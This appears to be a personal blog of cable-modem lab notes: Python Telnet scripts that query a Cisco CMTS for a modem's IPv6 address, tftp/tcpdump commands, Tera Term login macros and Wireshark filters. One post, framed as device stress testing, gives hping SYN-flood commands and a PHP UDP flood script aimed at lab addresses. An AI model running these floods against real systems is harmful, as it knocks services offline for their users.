Sunday, April 19, 2020

python telnet to cmts to get ipv6


This is a script to telnet to CMTS-Cisco server to get ipv6 address

The difference between Python 2 and Python 3 here is bytes versus str.

PYTHON3 we need to use tn.read_until(b"Username:")
PYTHON2 we don't need byte tn.read_until("Username:")

Since Python 3 needs bytes here, we have to convert the reply to str using decode.
We can decode as utf-8 or big5, depending on the OS. On a Chinese-language system you have to use BIG5, otherwise the ping output will not be shown correctly.

Manual Test:
1. Log in to the CMTS/Cisco server
2. Use this command to see your IPv6 address: scm XXX.XXX.XXXX ipv6


1) Method 1 (Python 3): just telnet and get the IPv6 address of a specific MAC
import getpass
import re
import telnetlib
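# Telnet to the CMTS, run "scm <mac> ipv6" and print the modem's IPv6 address.
#
# NOTE: Telnet sends the username, password and every command in cleartext,
# so this belongs on a trusted lab/management segment only.  telnetlib is
# deprecated since Python 3.11 and removed in Python 3.13.
HOST = "192.168.1.252"
# Prompting (the two commented lines) keeps credentials out of the file;
# the literals below are the lab defaults used in this example.
#user = input("Enter your remote account: ")
#password = getpass.getpass()
user = 'guest'
password = 'guest'
# Cable-modem MAC to look up (placeholder value).
mac = "AAAA.BBBB.CCCC"

tn = telnetlib.Telnet(HOST)

# Log in: answer each prompt as it appears.
tn.read_until(b"Username:")
tn.write(user.encode('ascii') + b"\n")
if password:
    tn.read_until(b"Password:")
    tn.write(password.encode('ascii') + b"\n")

# Wait for the CLI prompt, send the query, then collect the reply up to the
# next prompt.
tn.read_until(b"Router#")
tn.write(b"scm " + mac.encode('ascii') + b" ipv6\n")
value = tn.read_until(b"Router#")
#######################################################
value = value.decode('utf8')
# Only addresses whose first group is this value are recognised.
info = "2001"
# Take the first "2001:" token made of hex digits and colons.  A greedy
# ".*2001(.*)\n" prefix would lock onto the LAST "2001" in the reply (so
# 2001:db8:2001::1 would come back as 2001::1) and would keep any trailing
# "\r" from the line ending.
matchObj = re.search(r'(?<![0-9A-Fa-f:])' + info + r':[0-9A-Fa-f:]*', value)
#matchObj=matchObj.decode('big5')

if matchObj:
    Ipv6 = matchObj.group(0)
    print(Ipv6)
    #return Ipv6
else:
    print ("No match!!")

####################################################

tn.write(b"exit\n")
#print(tn.read_all().decode('ascii'))
# Release the socket once the session has been told to exit.
tn.close()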
2)Method 2 using function and check telnet reachable or not(python3)

# -*- coding: utf-8 -*-
import telnetlib
import subprocess
import time
import re

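def Telnet_Check_reachability(ip):
    """Ping *ip* three times and report whether a reply was seen.

    Assumes the Windows ``ping``: ``-n`` is its echo-request count and its
    reply lines contain ``TTL=``.

    Returns 1 when ``TTL=`` appears in the ping output, otherwise 0.
    """
    ping_count = 3
    # Argument list with the default shell=False: *ip* is handed to ping as
    # one argument and is never parsed by a command interpreter.
    process = subprocess.Popen(['ping', ip, '-n', str(ping_count)],
                               stdout=subprocess.PIPE,
                               stderr=subprocess.STDOUT)
    # communicate() drains the pipe while it waits; wait() followed by read()
    # can stall if the child fills the pipe buffer before exiting.
    raw_output, _ = process.communicate()
    # Only the ASCII marker matters, so bytes that are not valid Big5 are
    # replaced instead of raising UnicodeDecodeError.
    text = raw_output.decode("big5", errors="replace")
    return 1 if "TTL=" in text else 0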

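def Login_Telnet(HOST,username,password):
    """Open a Telnet session to *HOST* on port 23 and send the credentials.

    The host is pinged first and no connection is attempted when it does not
    answer.  Telnet is unencrypted, so *username* and *password* cross the
    network in cleartext.  Whether the device accepted the login is not
    checked here.

    Returns the ``telnetlib.Telnet`` object, or None when the host is
    unreachable or the session fails.
    """
    tn = None
    try:
        if Telnet_Check_reachability(HOST) != 1:
            return None
        tn = telnetlib.Telnet(HOST, 23)
        tn.read_until(b"Username:")
        tn.write(username.encode('ascii') + b"\n")
        if password:
            tn.read_until(b"Password:")
            tn.write(password.encode('ascii') + b"\n")
        # Presumably gives the device time to finish the login before the
        # caller starts reading.
        time.sleep(3)
        return tn
    except (IOError, EOFError):
        # read_until() raises EOFError when the peer closes the connection,
        # which "except IOError" alone would let escape.
        if tn is not None:
            tn.close()
        print ("Telnet " + HOST + " failed. Please check the server connection")
        return None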

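def telnet_To_CMTS(Client_IP, Client_Name, Client_Pwd, MAC):
    """Log in to the CMTS and return the IPv6 address shown for *MAC*.

    Sends ``scm <MAC> ipv6`` and scans the reply for an address that starts
    with ``2001:``.  *MAC* is placed in the command line unchanged, so a
    caller that takes it from outside input should validate it first
    (reject whitespace and line breaks).

    Returns the address as a str, or None (after printing a message) when
    the login fails or no such address appears in the reply.
    """
    tn = Login_Telnet(Client_IP, Client_Name, Client_Pwd)
    if not isinstance(tn, telnetlib.Telnet):
        print ("Telnet failed")
        return None

    time.sleep(1)
    # Consume everything up to the first CLI prompt.
    tn.read_until(b"Router#")
    # A single newline submits the command; a second one would only make the
    # device print one more empty prompt.
    command = "scm " + MAC + " ipv6\n"
    tn.write(command.encode('ascii'))
    value = tn.read_until(b"Router#")
    tn.close()
    time.sleep(1)

    # Only addresses whose first group is this value are recognised.
    info = "2001"
    value = value.decode('utf8')

    # Take the first "2001:" token made of hex digits and colons.  A greedy
    # ".*2001(.*)\n" prefix would lock onto the LAST "2001" in the reply (so
    # 2001:db8:2001::1 would come back as 2001::1) and would keep any
    # trailing "\r" from the line ending.
    matchObj = re.search(r'(?<![0-9A-Fa-f:])' + info + r':[0-9A-Fa-f:]*', value)
    if matchObj:
        return matchObj.group(0)
    print ("No match!!")
    return None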
# Lab example: CMTS management address, demo account and the modem MAC to query.
ip, username, password = "192.168.1.252", "guest", "guest"
mac = "AAAA.BBBB.CCCC"
# The result is the address string, or None when login or matching failed.
new_IPv6 = telnet_To_CMTS(ip, username, password, mac)
print(new_IPv6)

3)Method 3 same as method2 using python2
# -*- coding: utf-8 -*-
import telnetlib
import subprocess
import time
import re

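def Telnet_Check_reachability(ip):
    """Ping *ip* three times and report whether a reply was seen (Python 2).

    Assumes the Windows ``ping``: ``-n`` is its echo-request count and its
    reply lines contain ``TTL=``.

    Returns 1 when ``TTL=`` appears in the ping output, otherwise 0.
    """
    ping_count = 3
    # Argument list with the default shell=False: *ip* is handed to ping as
    # one argument and is never parsed by a command interpreter.
    process = subprocess.Popen(['ping', ip, '-n', str(ping_count)],
                               stdout=subprocess.PIPE,
                               stderr=subprocess.STDOUT)
    # communicate() drains the pipe while it waits; wait() followed by read()
    # can stall if the child fills the pipe buffer before exiting.
    output, _ = process.communicate()
    # In Python 2 the pipe yields a str, so no decode step is needed.
    return 1 if "TTL=" in output else 0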

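def Login_Telnet(HOST,username,password):
    """Open a Telnet session to *HOST* on port 23 and send the credentials (Python 2).

    The host is pinged first and no connection is attempted when it does not
    answer.  Telnet is unencrypted, so *username* and *password* cross the
    network in cleartext.  Whether the device accepted the login is not
    checked here.

    Returns the ``telnetlib.Telnet`` object, or None when the host is
    unreachable or the session fails.
    """
    tn = None
    try:
        if Telnet_Check_reachability(HOST) != 1:
            return None
        tn = telnetlib.Telnet(HOST, 23)
        tn.read_until("Username:")
        tn.write(username + "\n")
        if password:
            tn.read_until("Password:")
            tn.write(password + "\n")
        # Presumably gives the device time to finish the login before the
        # caller starts reading.
        time.sleep(3)
        return tn
    except (IOError, EOFError):
        # read_until() raises EOFError when the peer closes the connection,
        # which "except IOError" alone would let escape.
        if tn is not None:
            tn.close()
        print "Telnet " + HOST + " failed. Please check the server connection"
        return None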

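def telnet_To_CMTS(Client_IP, Client_Name, Client_Pwd, MAC):
    """Log in to the CMTS and return the IPv6 address shown for *MAC* (Python 2).

    Sends ``scm <MAC> ipv6`` and scans the reply for an address that starts
    with ``2001:``.  *MAC* is placed in the command line unchanged, so a
    caller that takes it from outside input should validate it first
    (reject whitespace and line breaks).

    Returns the address as a str, or None (after printing a message) when
    the login fails or no such address appears in the reply.
    """
    tn = Login_Telnet(Client_IP, Client_Name, Client_Pwd)
    if not isinstance(tn, telnetlib.Telnet):
        print "Telnet failed"
        return None

    time.sleep(1)
    # Consume everything up to the first CLI prompt.
    tn.read_until("Router#")
    tn.write("scm " + MAC + " ipv6\n")
    value = tn.read_until("Router#")
    tn.close()
    time.sleep(1)

    # Only addresses whose first group is this value are recognised.
    info = "2001"

    # Take the first "2001:" token made of hex digits and colons.  A greedy
    # ".*2001(.*)\n" prefix would lock onto the LAST "2001" in the reply (so
    # 2001:db8:2001::1 would come back as 2001::1) and would keep any
    # trailing "\r" from the line ending.
    matchObj = re.search(r'(?<![0-9A-Fa-f:])' + info + r':[0-9A-Fa-f:]*', value)
    if matchObj:
        return matchObj.group(0)
    print "No match!!"
    return None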


# Lab example: CMTS management address, demo account and the modem MAC to query.
ip, username, password = "192.168.1.252", "guest", "guest"
mac = "AAAA.BBBB.CCCC"
# The result is the address string, or None when login or matching failed.
new_IPv6 = telnet_To_CMTS(ip, username, password, mac)
print new_IPv6

Saturday, April 18, 2020

Unicode and decode python

Python 2 uses str here, but Python 3 uses bytes.




Reference 

You can use type(var) to see what type a variable is.

Thursday, April 16, 2020

Bash append file to date and time format

Some people like to export a file, or name a log, with the date and time appended, in a format like YYMMDD_MMHHSS.

I have a script that can append in this style:
@ECHO OFF
REM Build a timestamp from fixed character offsets into the date and time variables.
REM NOTE(review): the layout of the date variable depends on the Windows regional settings, so these offsets presumably fit the author's machine only - confirm on the target system.
set datetime=%date:~0,4%-%date:~8,2%-%date:~0,2%_%time:~0,2%%time:~3,2%%time:~6,2%
REM Replace every space in the timestamp with 0 - presumably for the leading space of a single-digit hour.
set datetime=%datetime: =0%
REM Append one line to the text file named after the timestamp.
echo hello >>%datetime%.txt
EXIT
It will output like this "2020-17-20_104919.txt"

if you don't want the second just modify like this
set datetime=%date:~0,4%-%date:~8,2%-%date:~0,2%_%time:~0,2%%time:~3,2%%time:~4,0%
Resource: 
https://stackoverflow.com/questions/1192476/format-date-and-time-in-a-windows-batch-script

Wednesday, April 15, 2020

ddos and security


DDOS Related attack command

command:
1. Run the attack while running bulk calls; the calls should not have problems
hping2  wan0 -2 0i u2 -I eth1
hping2  mta0 -2 0i u2 -I eth1
2. While the attack is running, web browsing on the CPE causes a kernel panic
hping3 -V -c 10000 -d 300 -S -p 80 -w 1500 --flood 10.15.3.4 (dummy0.3)
CPE1(lan)-------
CM-------
CMTS-----------CPE2(linux/ubuntu)
CPE1: open browser (youtube channel)
CPE2: used linux to run hping

Script to attach:
<?php 
// Paced UDP sender from the author's lab notes: one socket, one fixed destination host, random destination ports.
$host = '10.200.114.18';
// Target send rate in packets per second; it only feeds the delay computed below.
$pps = 5000; 
// Microseconds taken off each inter-packet delay - presumably to offset per-iteration overhead; confirm.
$tune = 125; 
$sock = socket_create( AF_INET, SOCK_DGRAM, SOL_UDP ); 
// Sleep per packet in microseconds (1,000,000 / pps minus the tuning value), clamped so it is never negative.
$uslp = (1000000 / $pps) - $tune; 
if( $uslp < 0 )
$uslp = 0; 
// 6,500,000 iterations; each sends the 4-byte payload 'LUT2' to a random port in 1025-65535 and then sleeps.
// On the receiving side this appears as a single source address sending small UDP datagrams to many
// different destination ports, which a per-source UDP rate limit on the device under test can bound.
for( $i = 6500000; $i > 0; $i-- )
{ $port = rand( 1025, 65535 ); socket_sendto( $sock, 'LUT2', 4, 0, $host, $port ); usleep( $uslp ); }
?>

IP Passthrough

How to test IP PASS Through

TEST STEP:

With MAC address
1)      Let modem to get online
2)      Connect CPE to CM on lan side
3)      Access GUI from Lan side, and add cpe mac address from ip passthrough
4)      CPE will get the same domain as erouter0
5)      Ping to cpe from CMTS or back of cmts

CPE1----------CM--------------CMTS------------CPE2

Cpe1 will get a public ip (same domain as erouter0)
CPE2 should be able to ping to CPE1



bsod

check BSOD on CMTS
#show cable l2-vpn xconnect dot1q-vc-map
Set VLAN on your config

tcpdump and tftp command


1. Window TFTP Command
tftp -i [IP ADD] [PUT|GET][ FILE NAME]
-g:     get file
 -r:     remote
 -p:     put file
  -l:     local

tftp -i 192.168.1.55 PUT test.txt

2. TFTP Linux
Example: 
tftp [-g|-p]  -r FILENAME SERVERIP
Download: 
tftp -g -r tcpdump 192.168.1.50

Upload
example: tftp -p -r test.txt 192.168.1.50

3. TCPdump and tftp Command, doing packet capture under ROUTER 
You can do this on linux PC also 

Capture all packet:
#cd /var/tmp
#tcpdump -nni any
Capture wan0 interface 
tcpdump -i wan0 -s 0 -w wan0.pcap&
stop capture packet, kill process id
#ps |grep .pcap
#kill -s tcpdum 'pid'

upload to your pc by tftp command
tftp -l wan0.pcap -p 192.168.1.50

Macro-Script

How to use a macro script (Tera Term) to do things like console access:

Example 1 using telnet method to login cisco server or router: 
File name: telnet_cisco.ttl
; Tera Term macro: open a Telnet session to the router and log in.
; The account name and password are stored in this file as plain text and
; are sent unencrypted, because the session is Telnet rather than SSH.
; Each wait command gives up after this many seconds.
timeout = 10
; Port 23 with /nossh /T=1: plain Telnet, SSH disabled.
connect '192.168.1.252:23 /nossh /T=1'
; Wait for the username prompt
wait 'Username:'
; Send username
sendln 'cisco'
; Wait for the password prompt
wait 'Password:'
; Send password
sendln 'cisco'
File name: cisco.bat
@echo off
REM Change to the Tera Term install folder, then start it with the login macro.
cd C:\Program Files (x86)\teraterm
REM The /m option names the macro file to run at startup.
TTERMPRO /m=D:\Macro_script\telnet_cisco.ttl
REM Keep the console window open until a key is pressed.
pause
How to used it:
Just run the cisco.bat, it will automatic telnet  for you.

Example 2: using serial comport to login your console 
File name: comport.ttl
; Tera Term macro for a serial console: send one command, then close the window.
; Wait 5 seconds before sending anything.
pause 5
; Send the command followed by a line ending
sendln "pacm "
; Wait 2 seconds before closing
pause 2
; closett closes the Tera Term window
closett

File name: comport.bat
@echo off
REM Change to the Tera Term install folder.
cd C:\Program Files (x86)\teraterm
REM Open serial port 3 at 115200 baud and run the comport.ttl macro; the port option is given twice on this line.
TTERMPRO /C=3 /BAUD=115200 /c=3 /m=D:\comport.ttl
REM Keep the console window open until a key is pressed.
pause
How to used it:
Just run comport.bat; it will automatically use Tera Term to open COM port 3 to your DUT console. If you have a different COM port, just change the c=3 to the correct COM port. My console port is 3, so I set it to 3.


wireshark Filter


Find IPV4 MAC address for DHCP
bootp.hw.mac_addr ==XX:XX:XX:XX:XX:XX
Find IPV6 MAC address for DHCP
dhcpv6.duidll.link_layer_addr == “XX:XX:XX:XX:XX:XX”
Find DNS query:
dns.qry.name == "XXX.XX.com"
Filter specific IP address overnight or many days. 
If you use the method above, your PC might hang: it captures every packet and only filters what is displayed. That is not the best way if you want to capture for many hours.

To solve this problem, capture only the packets you want, so that other packets are not captured at all.
capture>options>capture filter>type your target to filter(ex: host xxx.xxx.xxx.xxx && udp port=XX)